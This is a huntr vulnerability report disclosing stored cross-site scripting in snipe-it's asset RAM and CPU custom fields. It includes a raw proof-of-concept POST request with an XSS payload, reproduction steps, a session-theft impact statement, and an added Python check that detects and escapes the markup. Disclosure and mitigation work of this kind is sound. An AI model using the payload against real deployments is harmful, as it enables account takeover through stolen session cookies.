huntr report 5987AED5-6613-4937-8A3E-D48009B7DA10 by khanhchauminh (www.huntr.dev), Nov 11, 2021 - 8:08 a.m.

Cross-site Scripting (XSS) - Stored in snipe/snipe-it

Tags: stored xss, snipe-it, multipart message, post request, creating asset, editing asset

EPSS: 0.001 (percentile 21.4%)

Description

Multiple stored XSS vulnerabilities exist in the ‘_snipeit_ram_3’ and ‘_snipeit_cpu_4’ fields of the multipart POST request body sent when creating a new Asset or editing an existing Asset.

Proof of Concept

POST /hardware HTTP/1.1
Host: develop.snipeitapp.com
Connection: close
Content-Length: 2560
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://develop.snipeitapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary46mG0KnErxSyjdPS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://develop.snipeitapp.com/hardware/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: snipeitv5demo_session=0Eh7YSRhHibblEqPBiMIwljUeqCKslZfeRVyUL7Y; assetsListingTable.bs.table.pageNumber=1; assetsListingTable.bs.table.searchText=abcde; laravel_token=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%3D; XSRF-TOKEN=eyJpdiI6Ik9jZkdjcmFWazlOd2s0N3ZXRlZsYkE9PSIsInZhbHVlIjoiMWY1MnBuNG9XUnVZQlg4aTZGYXUzVEJ3a1k2ajlLVXBoRkZKKzZacXE0K2xod1JEbkdQSmN1UzVMSnduQ2d2UGRiTm01dUlJK1BhOUxrMGNmVzRBS2hDY2JIK1JVR1ZTRGw5WFZFMDR3VExmaVg1WDY3MjRSbnl2UWRaNkF0WHIiLCJtYWMiOiI0OTM0NGY2MGFjYTU5ODEzYjYxZTNiYjdkNTBjM2RhZDdjNmMxZTAxYmY4MjdmNDFkNjAyYjc4NDU1MmFmNTc2IiwidGFnIjoiIn0%3D

------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_token"

KqyxmJgNorRhODZo5Inzo4FAzqdOvLscrtYuzbQd
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="company_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="asset_tags[1]"

PGS-IT-sdf35777
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="serials[1]"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="model_id"

8
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_ram_3"

"&gt;<img src>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_cpu_4"

"&gt;<img src>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_mac_address_5"

00:00:5e:00:53:af
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="status_id"

1
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="checkout_to_type"

user
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_user"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_asset"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_location"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="name"

abcde
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_date"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="supplier_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="order_number"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_cost"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="warranty_months"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="notes"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="rtd_location_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary46mG0KnErxSyjdPS--

Steps to Reproduce

  • After login, in the dashboard, click Create New -> Asset in the top right corner to create a new asset.
  • Fill in the required information in all fields on the Create Asset page.
  • In the Model field, select a model for which the RAM and CPU fields appear.
  • In the RAM and CPU fields, input the payload "&gt;<img src>
  • Click the Save button.
  • In the left menu bar, click List All in the Assets section to go to the All Assets page.
  • Search for the name of the asset created above; an XSS popup will display.
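As an added example (not code from the report or from the snipe-it project), the check below parses the multipart body shown above, flags custom-field values (the _snipeit_* names) that carry HTML metacharacters or entities, and shows the output encoding that keeps such a value from rendering as markup on the listing page. The body is a constructed, abbreviated copy of the PoC with the same boundary, field names and payload.

```python
import html
import re

# Constructed sample: abbreviated copy of the PoC body, same boundary and field names.
BOUNDARY = "----WebKitFormBoundary46mG0KnErxSyjdPS"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="name"\r\n\r\nabcde\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="_snipeit_ram_3"\r\n\r\n"&gt;<img src>\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="_snipeit_cpu_4"\r\n\r\n"&gt;<img src>\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="_snipeit_mac_address_5"\r\n\r\n00:00:5e:00:53:af\r\n'
    f"--{BOUNDARY}--\r\n"
)

CUSTOM_FIELD = re.compile(r"^_snipeit_")          # snipe-it custom-field naming seen in the PoC
MARKUP = re.compile(r"[<>\"']|&#?\w+;")           # tag/attribute breakers or an HTML entity


def parse_multipart(body: str, boundary: str) -> dict:
    """Return {field name: raw value} for every form-data part in a multipart body."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":              # preamble / closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]*)"', headers)
        if match:
            fields[match.group(1)] = value
    return fields


def flag_markup_in_custom_fields(fields: dict) -> dict:
    """Detection: custom-field values that contain HTML metacharacters or entities."""
    return {k: v for k, v in fields.items() if CUSTOM_FIELD.match(k) and MARKUP.search(v)}


def sanitize_for_html(fields: dict) -> dict:
    """Mitigation: output-encode every value so the listing renders it as text, not markup."""
    return {k: html.escape(v, quote=True) for k, v in fields.items()}


if __name__ == "__main__":
    parsed = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print("flagged:", flag_markup_in_custom_fields(parsed))
    print("encoded:", sanitize_for_html(parsed))
```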

Impact

This vulnerability could be used to steal a user’s session cookie and, with the stolen cookie, gain unauthorized access to that user’s account.

PoC Video: PoC
